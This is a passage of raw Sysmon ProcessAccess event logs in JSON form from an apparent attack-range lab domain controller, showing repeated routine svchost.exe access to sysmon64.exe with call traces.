C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 